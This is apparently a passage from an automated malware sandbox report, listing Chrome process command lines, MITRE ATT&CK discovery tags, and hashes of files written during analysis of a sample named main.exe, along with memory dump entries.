  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=7192 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:4896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=7476 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:3644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=7468 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:4980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=5776 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:6396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=3392 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:6416
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=9332 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:6432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=5548 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:6552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=9044 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:6564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=8288 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:6696
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=8292 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:6712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=9452 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:6772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=49 --mojo-platform-channel-handle=4708 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:7136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=4636 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:7156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=8280 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:7164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4700 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6188

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4124

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:316

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
e769cf3b76eb5e1e94e7e473ae127bac

SHA1
4c5fc4ca791aa6de0c338af0bcb32afe96b4d736

SHA256
bea93ddc50005e72ede588c7d064d8b8c7644b2d6282439118a8ebe65bd4d28c

SHA512
5949a776e87519a8c912f73f42416e15368536af7e802948cf6ed63fca5182b69d2d35d8ccd0a4f360484f3c1ae0eb8e387571b47181fb1f43de3d65d1801745

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
b2ed463d8cf19b5cb4b5ca148b5d20ec

SHA1
ae97ad901dbed716e468fc085257f2f55e280561

SHA256
4e433ec5692ebd8ac685639e0f4b500f639cafaa1279fa6f3ec13bff7527561a

SHA512
3d46cc589f6aa3ac5397236dbbb51ce979d00a7055e2e4767b0f30b8899ca4a0a4667a29ae86743e1052c6d3a80eba5d5aeca76a64af345cb3996f09f9a60180

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
5456fb7869e50379196718eb674c1019

SHA1
8f9a1decedf34920642fd93870efcd4705585977

SHA256
bdce6782e96f44fb2b12c354766bac913c8cadc26b9480d11c06d698b4a3b1ba

SHA512
047af00ab03b94d7fb025718f8b6efb43151eb1eaf4a8cb1cf2bf7d52290b30f94e1732fbd189a2712a0f0d1e5a9ae2d9593d11148b45d5242243d9931831b4c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
16KB

MD5
cc80b4a80c400b79487cef0308128683

SHA1
c3c22954da232b3711c8ac0607cd8a6574405777

SHA256
3c1664d74a966f4b01f241b94776471f7ffe17eaacdb4fdeda917f669471ea93

SHA512
c2b53b900c6b01029981561767352dd44682ba65640b8c10c58bc78716f48a85929b1518fa3e857b49012e867a3753c9c6a13a7ff9d73cbcd081612cf1ca0d8c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
14KB

MD5
e92f08573fc0ef9ffb31e84c77aabe18

SHA1
236ee0b2513a223f2eb80ff3f3e1a3caa00f4af3

SHA256
2042b131c80636005c22f76932bd7dc93733f6a255a014911116181b04d5f359

SHA512
e19d242a5a85a8025dce0ed7a17ab954b2222eec421210433943edbae72a6649d593d53f292513e46505500f06402287d464476aee36547b3981f107d94f05be

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
5KB

MD5
0dbea2b015ac06019eaa4293c5525458

SHA1
640abb9fa0c2e05d98776f44d70237faec20f4c0

SHA256
dfb2fabef13feb0e65fbf07dd10e23983b0f1397c664a7bbdffa34b5e3f08fec

SHA512
aa9d67560c014979d6a92d37fc7d38f6432045176e0eb6f8af53697e46c2743861536cfe50460b01ee9f83e13a71a069f9834c3dfbea6b7ee0a5928b0fbc2688

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
5KB

MD5
49d5034c2442caf34677880fe753bdb9

SHA1
60ed37dedcb1c4b56d76362c00db8b8b9a498c1d

SHA256
5fbc4999fa43ada4212c37d01fffe418b5534875b09be02c77d70d3a3624b73c

SHA512
ae29d48c9a07de6138c4e2da814a5237a8d208269fb52f9fccc429d2361a967775af3ce3e17e673d00bae40921c7ffd8febef8bee0f6e4c9ba1ea59653301597

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
2KB

MD5
9da64ff019257cd7a7adc8b53302d5dc

SHA1
49b7b88573bfc52d666b5730562d526ae3490879

SHA256
c0087ca9c1ca7b1be5dcb3f49163fe919c04108c0a1d9d67cd01e33f17acf618

SHA512
3ca7ee7013da8c005c6e72f462d29702e602dc69d367eeda588186a220dbdc03417eb5478402ba911da71465d3193e0efa821c725125b47647ebec86bbe1fb09

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
5KB

MD5
4e0204acbf6a0e313d75814367f6c6c0

SHA1
6fc2718e95fdc986f6ca5260fa0140350fa28e88

SHA256
5662c223bc13c176c7354f4836cbb5e551b441b9d63e20869ed13fba23a3b036

SHA512
b0fdd5d52bb1136c38b172d871eec4781942716c761ab2cb888926cb74951808eb94cbf92f3d01a57e33c6523bf84a1eb5807bc9999743c1279b0bce0b1ad1a1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
6822996f0dca42f4fb130096cb5ab3f5

SHA1
17d4861df81f8ec05af40945110213b9e4e43b94

SHA256
d394956b0b79cb1293c813f459a3d949a27d1dcb50c197677ea1c45368e15d26

SHA512
e27dd10f2108baac9369712ee400ba93c90a6089f215f9e2f069536c66657dcbf4323df0008f6718658c9aa5f3c718974b5818149d02238e1ae90d5d1d881c07

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
8ccbf9d250ee22747329e02821731ba0

SHA1
243adcfc2c2928f39f81d1fe88f74c4379311252

SHA256
30b70e3f01c66c016d8c2d8b5d1f223885d9568ef6fa265470f4407a36650d60

SHA512
e90521922e05f250680a341572eb4cdd2d71a7c8ea418a2066fa5ee82fdbe280d8b065f2997a009252e9daa27510bf8fa7d277214d76d88d850c9bea3cb531a3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
66db2974119584eb35f23fbeb72bb65e

SHA1
d4248a1e863c52a7fd1c769b23e54f84417cb436

SHA256
0a3e478b129046e35885a967ac6a6ea03dc9d0fe0bb9cac11639e6251f6cc8bb

SHA512
7d45c8afbbedaf38a0c624096a274a9460ff671eb11b73fb9689e624afde644304d3ef49ad1c2f0e971a4f3c86f8d39cb36e6fa78c224e0f2de2b02bc9102d1a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
200KB

MD5
a4537fed2b30484ad72ecaba403c0906

SHA1
5f26242f61e222ee056a8b2fe647206117d16b50

SHA256
38c6334cb145b4a0dc633d8406d40e9499367367bb8cbac4d3b4dd5f4d2efdd5

SHA512
42ca0540ae4177d0203640d3c662fd835f2728e505a581a4e3cdee5d7e0a7379ca8aee92df41f083899f12e28481d450470459b01f6e5fb4a4959ad94b7d3f05

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w1hi2ndh.jr4.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\main.exe

Filesize
2.5MB

MD5
3e564e571a593bc773ebb7c0548605c2

SHA1
9c52c240c49a3005bfe90cf11fa5abdb9a6170dc

SHA256
b5f813ada86f138a68cb88bba0fcd82f5de9a5e9b8a7980f14effb02baf33cca

SHA512
8e0d9ea600befb8d185a5b0eb7b296cf318dfef47e37d7c9696a55b693dbe953e7ec10fda3564648e265ead0daeda266cd4a6ce14f49281dc6036b4c08c19486

Download Submit
C:\Users\Admin\Downloads\main.exe

Filesize
2.5MB

MD5
3e564e571a593bc773ebb7c0548605c2

SHA1
9c52c240c49a3005bfe90cf11fa5abdb9a6170dc

SHA256
b5f813ada86f138a68cb88bba0fcd82f5de9a5e9b8a7980f14effb02baf33cca

SHA512
8e0d9ea600befb8d185a5b0eb7b296cf318dfef47e37d7c9696a55b693dbe953e7ec10fda3564648e265ead0daeda266cd4a6ce14f49281dc6036b4c08c19486

Download Submit
C:\Users\Admin\Downloads\main.exe

Filesize
2.5MB

MD5
3e564e571a593bc773ebb7c0548605c2

SHA1
9c52c240c49a3005bfe90cf11fa5abdb9a6170dc

SHA256
b5f813ada86f138a68cb88bba0fcd82f5de9a5e9b8a7980f14effb02baf33cca

SHA512
8e0d9ea600befb8d185a5b0eb7b296cf318dfef47e37d7c9696a55b693dbe953e7ec10fda3564648e265ead0daeda266cd4a6ce14f49281dc6036b4c08c19486

Download Submit
C:\Users\Admin\Downloads\main.exe

Filesize
2.5MB

MD5
3e564e571a593bc773ebb7c0548605c2

SHA1
9c52c240c49a3005bfe90cf11fa5abdb9a6170dc

SHA256
b5f813ada86f138a68cb88bba0fcd82f5de9a5e9b8a7980f14effb02baf33cca

SHA512
8e0d9ea600befb8d185a5b0eb7b296cf318dfef47e37d7c9696a55b693dbe953e7ec10fda3564648e265ead0daeda266cd4a6ce14f49281dc6036b4c08c19486

Download Submit
memory/316-323-0x0000000000400000-0x0000000000515000-memory.dmp

Filesize
1.1MB

Download
memory/852-383-0x0000000000400000-0x0000000000515000-memory.dmp

Filesize
1.1MB

Download
memory/3768-371-0x000002947DEE0000-0x000002947DEF0000-memory.dmp

Filesize
64KB

Download
memory/3768-370-0x000002947DEE0000-0x000002947DEF0000-memory.dmp

Filesize
64KB

Download
memory/4984-308-0x0000028C12360000-0x0000028C12E21000-memory.dmp

Filesize
10.8MB

Download
memory/4984-301-0x0000028C2B360000-0x0000028C2B370000-memory.dmp

Filesize
64KB

Download
memory/4984-300-0x0000028C2B360000-0x0000028C2B370000-memory.dmp

Filesize
64KB

Download
memory/4984-299-0x0000028C2B360000-0x0000028C2B370000-memory.dmp

Filesize
64KB

Download
memory/4984-298-0x0000028C2B360000-0x0000028C2B370000-memory.dmp

Filesize
64KB

Download
memory/4984-291-0x0000028C2B2E0000-0x0000028C2B302000-memory.dmp

Filesize
136KB

Download